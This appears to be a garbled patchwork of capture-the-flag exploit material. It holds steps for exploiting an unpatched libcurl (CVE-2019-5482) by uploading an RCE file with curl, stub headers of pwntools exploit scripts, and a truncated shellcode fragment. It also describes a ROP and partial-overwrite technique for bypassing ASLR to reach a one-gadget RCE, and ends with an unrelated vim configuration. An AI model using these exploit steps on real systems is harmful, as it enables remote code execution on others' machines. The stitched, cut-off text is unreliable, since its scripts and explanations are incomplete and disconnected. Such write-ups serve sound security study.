- Confirm that you have an unpatched version of libcurl, which contains CVE-2019-5482
- Update the IP addresses in the source files
- Launch srv.py on the server
- Upload sol.php via curl: curl http://$URL:$PORT/ -d 'rce@sol.php'
#!/usr/bin/python
import os
import socket
import struct
from time import sleep
from pwn import *

bind_ip = '0.0.0.0'  # listen on all interfaces
#!/usr/bin/python
import re
import os
import sys
import socket
import threading
from time import sleep
from pwn import *
#!/usr/bin/env python
from pwn import *

context(os='linux', arch='amd64')
BINARY = './hq2017_task6_m116'

def generate_shellcode():
    # first fragment of the shellcode (remainder of the script is cut off in the source)
    c1 = '\x6a\x68\x90\xbaAAAA'
The service fluxmail is a binary service that runs as a systemd socket unit, and thus can also be launched from the command line for testing. After launch, the main process starts a child process and communicates with it via pipes. The parent process interprets commands from the user and sends messages down the pipe; the child process executes the commands and sends the result back to the parent, so that the parent can print it. All required information is stored in a data folder, so it can be reused later.
After reading the initial bits I realized:
- The bug is probably logical. It would be very hard to exploit an overflow bug in a PIE binary.
- It is very strange that data processing is moved to a child process. Why? Maybe we could somehow inject into the protocol (didn't work out for me).
There are several files, which contain user information:
By using the so-called universal gadget from __libc_csu_init we can read shellcode into the rwx memory segment and return into it.
By calling the read function we can overwrite only the last two bytes of the read address to find something useful and defeat ASLR. Fortunately there is a one-gadget RCE located at 0xf0567 in this version of libc, right near the read function (0xf6670). We overwrite only the last two bytes to defeat ASLR, so only around 16 attempts are needed, because only 4 bits of ASLR entropy fall within those bytes.
EDIT: check out another great solution proposed by agadeint in the comment section below, which is cleaner and does not require brute-forcing or a one-gadget.
" Line numeration
set noeb
set nu
" Use Vim settings, rather than Vi settings (much better!).
set nocompatible
" Turn on the verboseness to see everything vim is doing.
"set verbose=9